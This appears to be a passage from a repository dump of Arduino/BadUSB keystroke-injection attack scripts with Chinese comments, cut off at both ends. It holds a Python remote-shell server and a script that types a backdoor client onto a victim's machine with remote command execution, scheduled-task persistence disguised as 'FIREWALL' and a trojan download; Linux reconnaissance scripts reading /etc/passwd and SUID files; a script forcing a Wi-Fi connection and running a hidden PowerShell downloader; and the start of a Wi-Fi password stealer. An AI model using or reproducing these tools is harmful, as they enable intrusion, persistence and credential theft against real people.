')\n\t\t\t\tfilename=lists[2]\n\t\t\t\tf=open(filename).read()\n\t\t\t\tcontents='-p'+f\n\n\t\t\tcontents_j=binascii.b2a_hex(base64.b64encode(contents)) #将要发送的数据加码\n\t\t\tself.client.send(contents_j+' ') #发送数据\n\t\t\tself.client.close()\n\n\t\t\tif contents=='kill' or contents=='exit':\n\t\t\t\ttime.sleep(5)\n\t\t\t\tsys.exit()\n\t\n\tdef main(self):\n\t\tself.connec() #执行连接函数\n\t\twhile True:\n\t\t\t'''\n\t\t\t循环接收客户端信息\n\t\t\t'''\n\t\t\ttry:\n\t\t\t\tself.client,self.addr=self.server.accept()  #接收到客户端数据对象，保存到client中，addr中的为客户端ip与端口号\n\t\t\t\tself.handle_client()   #执行接收发送数据函数\n\t\t\texcept:\n\t\t\t\tsys.exit()\n\ndef mains():\n\t'''\n\t从控制台接收参数，执行相应的代码（Server）\n\t'''\n\tif 
len(sys.argv)>2:\n\t\tip=str(sys.argv[1])\n\t\tport=int(sys.argv[2])\n\n\t\taddress_all=(ip,port)\n\t\tservers(address_all)\n\t\tprint '[HELP]  PyShell.exe [ip] [port]'\n\t\tprint '[HELP]  python PyShellServer.py [ip] [port]'\n\t\tprint u'connection：'\n\t\tprint u'[HELP]  exit    ----退出连接'\n\t\tprint u'[HELP]  kill    ----退出连接并自毁程序'\n\t\tprint u'[HELP]  playtask    ----创建计划任务'\n\t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'\n\telse:\n\t\tprint '[HELP]  PyShell.exe [ip] [port]'\n\t\tprint '[HELP]  python PyShellServer.py [ip] [port]'\n\t\tprint u'connection：'\n\t\tprint u'[HELP]  exit    ----退出连接'\n\t\tprint u'[HELP]  kill    ----退出连接并自毁程序'\n\t\tprint u'[HELP]  playtask    ----创建计划任务'\n\t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'\n\nif __name__=='__main__':\n\tmains()\n"
  },
  {
    "path": "TrojanDownloader/PY_DownLoader/Py_TrojanWrite(TargetEnvironmentRunPython).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n \n  Keyboard.println(\"ECHO import socket >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import base64 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import sys >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import binascii >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import os >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import re >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import threading >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import time >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO from StringIO import StringIO >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import requests >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO class clients: >> PyShell.py\");\n  delay(100); \n  Keyboard.println(\"ECHO \t\"\"\"Client of PythonShell >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\"\"\" >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef __init__(self,client_address): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.client_address=client_address >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.main() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef request_client(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t连接服务端 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\ttry: >> PyShell.py\");\n  
delay(100);\n  Keyboard.println(\"ECHO \t\t\tpath=os.getcwd() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)   #创建一个socket对象 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.connect(self.client_address)                   #连接服务端 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.contents=binascii.b2a_hex(base64.b64encode(self.contents+'*'+path)) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.send(self.contents) #发送数据 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef kill(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tkill project >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tos.popen('kill.bat').read() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef exits(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\texit project >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tos._exit(0) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef response_client(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t客户端处理服务端命令函数 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tresponse=self.client.recv(409600) >> PyShell.py\");\n  delay(100);\n  
Keyboard.println(\"ECHO \t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tresponse=base64.b64decode(binascii.a2b_hex(response.strip())) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='exit':  #退出当前连接！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='kill':  #退出当前连接并自毁程序！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf=open('kill.bat','w') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf.write('ping -n 2 127.0.0.1 >nul\\ndel /F PyShell.exe\\ndel /F kill.bat') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf.close() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tthreading.Thread(target=self.kill).start() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\ttime.sleep(0.5) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tthreading.Thread(target=self.exits).start() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='playtask':        #给自己创建计划任务！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpath=os.getcwd() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tname=os.popen('whoami').read().split('\\\\')[1].replace('\\n','')  #获取当前用户名称 >> PyShell.py\");\n  
delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tcommand='schtasks.exe  /Create /RU '+'\"'+name+'\"'+' /SC MINUTE /MO 30 /TN FIREWALL /TR '+'\"'+path+\\'\\\\PyShell.exe\\'+'\"'+' /ED 2016/12/12'#可执行文件一定要写绝对路径  >> PyShell.py\");\n  delay(100); \n  Keyboard.println(\"ECHO \t\t\t\t\t\t#以上这条为添加一条计划任务的命令！！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=os.popen(command).read() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ti='-p' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\tif i in response: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tlists=response.split('-p') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tresponse=lists[1] >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tsys.stdout=result=StringIO() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\texec(response)                      #执行python脚本文件 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=result.getvalue() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=response.split('cd ') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tm=re.search(self.res,response) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tif m: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tm=m.group() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tm='.' 
>> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tif len(self.contents)>1: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tos.chdir(self.contents[1].strip())          #切换目录，popen('cd ../')只能切换子目录，父目录改不了 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tself.contents=os.popen(self.contents[0]).read()   #执行普通的cmd命令 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tos.chdir(m) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.close() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef main(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.res=r'[A-Za-z]:' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\twhile True: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.request_client() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.response_client() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO def mains(): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t从控制台接收参数，执行相应的代码（Client or Server） >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \turl = 'https://www.youtube.com/watch?v=aDwCCUfNFug'    //自定义下载木马网址 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO     r = requests.get(url) >> PyShell.py\");\n  
delay(100);\n  Keyboard.println(\"ECHO     with open('PyShell.exe', 'wb') as f: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         f.write(r.content) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tif len(sys.argv)>2: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tip=str(sys.argv[1]) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tport=int(sys.argv[2]) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\taddress_all=(ip,port) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tclients(address_all) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'connection：' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  exit    ----退出连接' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  playtask    ----创建计划任务' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'connection：' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  exit    ----退出连接' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  
playtask    ----创建计划任务' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py\");\n  delay(100);\n\n  Keyboard.println(\"python PyShell.py [ip] [port]\");  //输入自己的IP及端口，在攻击者电脑上执行服务器脚本，等待目标连接\n  delay(2000);\n    Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "Ubuntu_InformationGathering/BasicTerminalCommandsForUbuntu(Display).ino",
    "content": "//Ubuntu的基本终端命令\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(KEY_F2);\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_F2);\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"XTERM\");\n  delay(500);\n  Keyboard.println();\n  delay(750);\n  Keyboard.print(\"PWD\");\n  delay(500);\n  Keyboard.println();\n  delay(300);\n  Keyboard.print(\"ID\");\n  delay(300);\n  Keyboard.println();\n  delay(500);\n  Keyboard.print(\"CAT /ETC/PASSWD\")\n  delay(500);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "Ubuntu_InformationGathering/UbuntuInformationCollectionTXT_File(Information).ino",
    "content": "//信息收集\n//启用Ubuntu终端搜集操作系统信息\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(KEY_F2);\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_F2);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.print(\"GNOME-TERMINAL\");\n  delay(100);\n  Keyboard.println();\n  delay(200);\n  Keyboard.print(\"CLEAR\");\n  delay(10);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO \\\"lOGGED IN USER:\\\" $user > INFO_GATHERING.TXT\");\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO 0N \\\"dISTRIBUTION kERNEL vERSION:\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"CAT /ETC/ISSUE | CUT -C1-13 >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO -N \\\"UNAME RESULTS: \\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"UNAME -A >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO \\\"sHELLSOCK bUG vULNERABILITY\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ENV X='() { :;};ECHO VULNERABLE' BASH -C `ECHO HELLO` >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.println();\n  delay(100);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.println(\"ECHO \\\"mOUNTED FILESYSTEMS\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  
Keyboard.println(\"MOUNT -L >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"ECHO \\\"nETWORK cONFIGURATION\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.println(\"IFCONFIG -A | GREP 'lINK\\\\|INET' >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"pRINT hOSTS\\\" >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"CAT /ETC/HOSTS >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO ECHO \\\"pRINT arp\\\" >>  INFO_GATHERING.TXT\");\n  delay(50); \n  Keyboard.println(\"ARP >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"dEVELOPMENT TOOLS AVAILABILITY\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH GCC >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH G++ >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH PYTHON >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"pRINT tcp/UDP lISTENING sERVICES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"NETSTAT -TUNLPE >> INFO_GATHERING.TXT\");\n  delay(300);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"ECHO \\\"iNSTALLED pACKAGES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(200);\n  Keyboard.println(\"DPKG -L >> INFO_GATHERING.TXT\");\n  delay(300);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"fIND rEADABLE fOLDERS IN /ETC\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"FIND /ETC -USER `ID -U` -PERM -U=R -O -GROUP `ID -G` -PERM -G=R -O -PERM -O=R -LS 2> 
/DEV/NULL >>  INFO_GATHERING.TXT\");\n  delay(500);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"\\\"fIND suid AND guid FILES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"FIND / -TYPE F -PERM -U=S -O -TYPE F -PERM -G=S -LS 2>/DEV/NULL >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "WiFi_ConnectionTrojan/ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino",
    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n\n\nvoid setup(){\n  \n  delay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd(3,500,\"cmd /T:01 /K \\\"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\\\"\"))\n  {\n  reset_windows_desktop(2000);\n  }\n\n  Keyboard.println(\"echo ^<?xml version=\\\"1.0\\\"?^> > %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<WLANProfile xmlns=\\\"http://www.microsoft.com/networking/WLAN/profile/v1\\\"^> >> %TEMP%\\\\pl.xml \");  //强迫连接WIFI热点，并下载psl木马\n  Keyboard.println(\"echo ^<name^>INPUT0^</name^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<SSIDConfig^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<SSID^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<hex^>INPUT1^</hex^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<name^>INPUT0^</name^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</SSID^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</SSIDConfig^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<connectionType^>ESS^</connectionType^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<connectionMode^>auto^</connectionMode^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<MSM^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<security^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<authEncryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<authentication^>WPA2PSK^</authentication^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<encryption^>AES^</encryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<useOneX^>false^</useOneX^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</authEncryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<sharedKey^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<keyType^>passPhrase^</keyType^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo 
^<protected^>false^</protected^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<keyMaterial^>INPUT2^</keyMaterial^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</sharedKey^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</security^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</MSM^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</WLANProfile^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"netsh wlan add profile filename=%TEMP%\\\\pl.xml \");\n  delay(2000);\n  Keyboard.println(\"netsh wlan connect name=INPUT0 \");\n  delay(3000);\n  Keyboard.println(\"echo $wc = New-Object System.Net.WebClient > %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo $url = \\\"INPUT3\\\" >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [string]$hex = $wc.DownloadString($url) >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [System.IO.File]::WriteAllBytes(\\\"%TEMP%\\\\svcfw.exe\\\", $temp) >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo start-process -nonewwindow \\\"%TEMP%\\\\svcfw.exe\\\" >> %temp%\\\\dl.ps1\");\n   \n  delay(2000);\n  \n  Keyboard.println(\"echo Set oShell = CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\dl.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\dl.ps1\\\"),0,true >> %temp%\\\\dl.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\dl.vbs\");\n  delay(3000);\n  \n  Keyboard.println(\"exit\");\n\n  \n\n}\n\nvoid loop(){\n}\n\nDEFS\n\n\n\n\n"
  },
  {
    "path": "WiFi_PasswordAcquisition/WiFiPasswordCapture(tool).ino",
    "content": "/ /无线密码捕获工具\n//说明:将SSID、网络类型、鉴权、密码保存到Log.txt中，将Log.txt的内容通过email发送到gmail账户。\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n//Minimize all windows and open run cmd\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.press('d');\n  delay(200); \n  Keyboard.release('d');\n  delay(200); \n  Keyboard.print(\"r\");\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================cmd==========================\n  Keyboard.println(\"cmd\");\n  delay(1000);\n  //获取SSID信息\n  Keyboard.println(\"CD \\\"%userprofile%\\\\dEsktop\\\" & FOR /F \\\"TOKENS=2 DELIMS=: \\\" %A in ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \\\"SSID\\\" ^| FINDSTR /V \\\"bssid\\\"') DO SET a=%a\");\n  //搜寻关键字符串，创建TXT文件\n  Keyboard.println(\"NETSH WLAH SHOW PROFILES %a% KEY=CLEAR | FINDSTR /C:\\\"nETWORK TYPE\\\" /C:\\\"aUTHENTICATION\\\" /C:\\\"kEY cONTENT\\\" | FINDSTR /V \\\"BROADCAST\\\" | FINDSTR /V \\\"rADIO\\\">>a.TXT\");\n  //获取网络类型\n  Keyboard.println(\"FOR /F \\\"TOKENS=3 DELIMS=: \\\" %a IN ('FINDSTR \\\"nETWORK TYPE\\\" a.TXT') DO SET b=%a\");\n  //获得认证\n  Keyboard.println(\"FOR /F \\\"TOKENS=2 DELIMS=: \\\" %a IN ('FINDSTR \\\"aUTHENTICATION\\\" a.TXT') DO 